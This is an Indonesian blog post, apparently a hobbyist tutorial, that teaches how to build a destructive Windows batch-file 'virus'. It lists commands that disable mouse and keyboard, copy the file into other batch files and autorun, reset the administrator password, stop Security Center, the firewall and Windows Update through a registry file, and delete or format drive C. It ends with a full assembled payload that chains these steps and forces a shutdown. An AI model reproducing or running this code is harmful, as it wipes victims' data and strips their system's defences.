Mungkin ini sedikit berguna buat sobat-sobat yang suka bermain dengan virus yang memakai ekstensi .bat. ya udah kita mulai praktekan aja yah... hehehe :D
Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa script perintah jika kita ingin bermain diregistri komputer.
+(1).jpg)
Saya tidak menyarankan anda untuk menjalankan virus ini dikomputer sendiri ! Virus ini dibuat dengan Notepad dan di save as dengan ekstension .bat Jangan lupa untuk merubah Save as type menjadi All files.
1. BASIC
Invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
Buka URL yg diinginkan
start [url]http://www.google.com[/url]
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse setelah Restart
rundll32 mouse,disable
Disable keyboard setelah Restart
rundll32 keyboard,disable
Freezes komputer setelah Restart
rundll32 user,disableoemlayer
2. Worm
Memperbanyak Diri di Dalam Direktori :
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
Me-replace File Batch yang Lain
%0 >>other.bat
Trojan :
Mengirim daftar file dalam direktori
dir *.*>>Filelist.txt
Ganti Password Admin
net user administrator PASSWORD HERE
Membuat Info IP
ipconfig >Computer-IP-address.txt
3. Perusak
Copy ke Autorun
COPY %0 %windir%WINSTART.BAT
Format Drive C
format c: /q /autotest
Delete Windows
DELTREE /Y %windir%
Delete Drive C dengan Paksa
DEL /F /S /Q C:
Mematikan Firewall & Security Center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
Pause
Pause Sampai Tekan Sembarang Tombol
Pause
Pause 20 Detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul
Berikut Hasil Akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
[-] Disables mouse & keyboard
[-] Copy ke AUTORUN
[-] Stop Security Center
[-] Display "Anda kena VIRUS!!!" selama 5 detik
[-] Starts [url]http://www.youtube.com[/url]
[-] Disable firewall
[-] Delete c: drive
[-] Force shutdown dengan pesan "Ucapkan selamat tinggal pada komputermu!"
Oke, Sekian dulu gan. dan jangan taruh virus ini di dalam komputermu! Semoga Bermanfaat :)
0 komentar:
Posting Komentar